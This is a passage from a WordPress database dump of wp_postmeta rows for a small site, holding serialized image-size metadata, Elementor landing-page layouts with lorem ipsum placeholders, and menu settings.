ail\";a:5:{s:4:\"file\";s:26:\"Artboard-1-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7274,1300,'_wp_attached_file','2022/03/Artboard-2-8.png'),(7275,1300,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:24:\"2022/03/Artboard-2-8.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-2-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"Artboard-2-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Artboard-2-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-2-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-2-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7276,1301,'_wp_attached_file','2022/03/Artboard-3-8-1.png'),(7277,1301,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-3-8-1.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-3-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7278,1302,'_wp_attached_file','2022/03/Artboard-4-8.png'),(7279,1302,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:24:\"2022/03/Artboard-4-8.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-4-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"Artboard-4-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Artboard-4-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-4-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-4-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7283,1216,'_oembed_b76db13a8efdd2ab1d6cad1eb7c73b66','{{unknown}}'),(7297,1309,'_wp_attached_file','2022/09/3483-low-poly-light-pink-background-illustrator-scaled.jpg'),(7298,1309,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:2560;s:4:\"file\";s:66:\"2022/09/3483-low-poly-light-pink-background-illustrator-scaled.jpg\";s:8:\"filesize\";i:236562;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"3483-low-poly-light-pink-background-illustrator-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13180;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"3483-low-poly-light-pink-background-illustrator-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69379;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"3483-low-poly-light-pink-background-illustrator-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4887;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"3483-low-poly-light-pink-background-illustrator-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47459;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"3483-low-poly-light-pink-background-illustrator-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118113;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:61:\"3483-low-poly-light-pink-background-illustrator-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:176294;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:59:\"3483-low-poly-light-pink-background-illustrator-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14183;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:57:\"3483-low-poly-light-pink-background-illustrator-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1102;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:59:\"3483-low-poly-light-pink-background-illustrator-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2750;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:57:\"3483-low-poly-light-pink-background-illustrator-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1010;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:57:\"3483-low-poly-light-pink-background-illustrator-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1010;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:51:\"3483-low-poly-light-pink-background-illustrator.jpg\";}'),(7303,1313,'_elementor_edit_mode','builder'),(7304,1313,'_elementor_template_type','landing-page'),(7305,1314,'_elementor_edit_mode','builder'),(7306,1314,'_elementor_template_type','landing-page'),(7307,1315,'_elementor_edit_mode','builder'),(7308,1315,'_elementor_template_type','landing-page'),(7309,1313,'_wp_page_template','elementor_canvas'),(7310,1313,'_elementor_version','3.7.6'),(7311,1316,'_elementor_edit_mode','builder'),(7312,1316,'_elementor_template_type','landing-page'),(7313,1316,'_wp_page_template','elementor_canvas'),(7314,1316,'_elementor_version','3.7.6'),(7315,1313,'_edit_lock','1663301536:1'),(7316,1317,'_edit_lock','1663301476:1'),(7317,1317,'_edit_last','1'),(7318,1317,'_elementor_edit_mode','builder'),(7319,1317,'_elementor_template_type','wp-page'),(7320,1317,'_elementor_version','3.7.6'),(7321,1319,'_elementor_edit_mode','builder'),(7322,1319,'_elementor_template_type','landing-page'),(7323,1320,'_elementor_edit_mode','builder'),(7324,1320,'_elementor_template_type','landing-page'),(7325,1321,'_elementor_edit_mode','builder'),(7326,1321,'_elementor_template_type','landing-page'),(7327,1319,'_wp_page_template','elementor_canvas'),(7328,1319,'_elementor_version','3.7.6'),(7329,1322,'_elementor_edit_mode','builder'),(7330,1322,'_elementor_template_type','landing-page'),(7331,1322,'_wp_page_template','elementor_canvas'),(7332,1322,'_elementor_version','3.7.6'),(7333,1319,'_edit_lock','1663302221:1'),(7334,1323,'_wp_attached_file','2022/09/elegant-cream-fabric-isolated-on-600w-2179731583.webp'),(7335,1323,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:296;s:4:\"file\";s:61:\"2022/09/elegant-cream-fabric-isolated-on-600w-2179731583.webp\";s:8:\"filesize\";i:10100;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"elegant-cream-fabric-isolated-on-600w-2179731583-300x148.webp\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3442;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"elegant-cream-fabric-isolated-on-600w-2179731583-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2400;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:61:\"elegant-cream-fabric-isolated-on-600w-2179731583-320x296.webp\";s:5:\"width\";i:320;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6440;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:59:\"elegant-cream-fabric-isolated-on-600w-2179731583-50x25.webp\";s:5:\"width\";i:50;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:372;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:61:\"elegant-cream-fabric-isolated-on-600w-2179731583-100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1510;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:59:\"elegant-cream-fabric-isolated-on-600w-2179731583-48x24.webp\";s:5:\"width\";i:48;s:6:\"height\";i:24;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:376;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:59:\"elegant-cream-fabric-isolated-on-600w-2179731583-48x24.webp\";s:5:\"width\";i:48;s:6:\"height\";i:24;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:376;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7336,1319,'_elementor_data','[{\"id\":\"0a5d499\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a72dd06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bf7eaaa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3fdf19f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a13a192\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ad7a05\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/elegant-cream-fabric-isolated-on-600w-2179731583.webp\",\"id\":1323,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(7337,1319,'_elementor_page_assets','a:0:{}'),(7340,1324,'_edit_lock','1663303247:1'),(7341,1324,'_edit_last','1'),(7342,1324,'_elementor_edit_mode','builder'),(7343,1324,'_elementor_template_type','wp-page'),(7344,1324,'_elementor_version','3.7.6'),(7345,1324,'_wp_page_template','frontpage.php'),(7346,1324,'_elementor_data','[]'),(7347,1324,'_elementor_page_assets','a:0:{}'),(7348,1326,'_elementor_edit_mode','builder'),(7349,1326,'_elementor_template_type','landing-page'),(7350,1327,'_elementor_edit_mode','builder'),(7351,1327,'_elementor_template_type','landing-page'),(7352,1328,'_elementor_edit_mode','builder'),(7353,1328,'_elementor_template_type','landing-page'),(7354,1326,'_wp_page_template','elementor_canvas'),(7355,1326,'_elementor_version','3.7.6'),(7356,1329,'_elementor_edit_mode','builder'),(7357,1329,'_elementor_template_type','landing-page'),(7358,1329,'_wp_page_template','elementor_canvas'),(7359,1329,'_elementor_version','3.7.6'),(7360,1326,'_edit_lock','1663306267:1'),(7361,1326,'_elementor_data','[{\"id\":\"ef04faa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cb5bb35\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"468fa23\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b60a9a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d0e546\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3682b83\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"013bddc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97e062e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a681d49\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7362,1326,'_elementor_page_assets','a:0:{}'),(7367,1331,'_menu_item_type','custom'),(7368,1331,'_menu_item_menu_item_parent','0'),(7369,1331,'_menu_item_object_id','1331'),(7370,1331,'_menu_item_object','custom'),(7371,1331,'_menu_item_target',''),(7372,1331,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7373,1331,'_menu_item_xfn',''),(7374,1331,'_menu_item_url','https://gopalak.in/#home'),(7375,1331,'_menu_item_orphaned','1663305381'),(7391,1333,'_elementor_edit_mode','builder'),(7392,1333,'_elementor_template_type','landing-page'),(7393,1334,'_elementor_edit_mode','builder'),(7394,1334,'_elementor_template_type','landing-page'),(7395,1335,'_elementor_edit_mode','builder'),(7396,1335,'_elementor_template_type','landing-page'),(7397,1333,'_wp_page_template','elementor_canvas'),(7398,1333,'_elementor_version','3.7.6'),(7399,1336,'_elementor_edit_mode','builder'),(7400,1336,'_elementor_template_type','landing-page'),(7401,1336,'_wp_page_template','elementor_canvas'),(7402,1336,'_elementor_version','3.7.6'),(7403,1333,'_edit_lock','1663333069:1'),(7404,1337,'_edit_lock','1663333073:1'),(7405,1337,'_edit_last','1'),(7406,1337,'_elementor_edit_mode','builder'),(7407,1337,'_elementor_template_type','wp-page'),(7408,1337,'_elementor_version','3.7.6'),(7409,1333,'_elementor_data','[{\"id\":\"0d4c6b0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e35cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b1b231\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"58\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ddba5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":62.673999999999999},\"elements\":[],\"isInner\":false},{\"id\":\"f6b412a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":37.280999999999999},\"elements\":[{\"id\":\"dec077e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"title_color\":\"#051218\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a896446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"align\":\"center\",\"text_color\":\"#070606\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":0,\"color\":\"rgba(8.457065217391303, 21.384846408317582, 29.249999999999996, 0.3)\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"813e074\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"45\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"54e7d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"a0e6cb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f7019e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"91\",\"right\":0,\"bottom\":\"1\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#F2FFED\"},\"elements\":[{\"id\":\"9403a68\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"border_border\":\"solid\"},\"elements\":[{\"id\":\"7208e00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"be119ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3111173\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"d2bb935\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6560df9\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fca512b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ff468f\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false}]'),(7410,1333,'_elementor_page_assets','a:0:{}'),(7411,1337,'_wp_page_template','elementor_theme'),(7412,1337,'_elementor_data','[{\"id\":\"9e03047\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0cd35f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7413,1337,'_elementor_page_assets','a:0:{}'),(7414,1339,'_wp_attached_file','2022/09/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp'),(7415,1339,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:125;s:6:\"height\";i:59;s:4:\"file\";s:73:\"2022/09/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\";s:8:\"filesize\";i:23340;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"cows-farming-on-green-meadow-260nw-1704884002-300x134.webp\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6884;}s:9:\"thumbnail\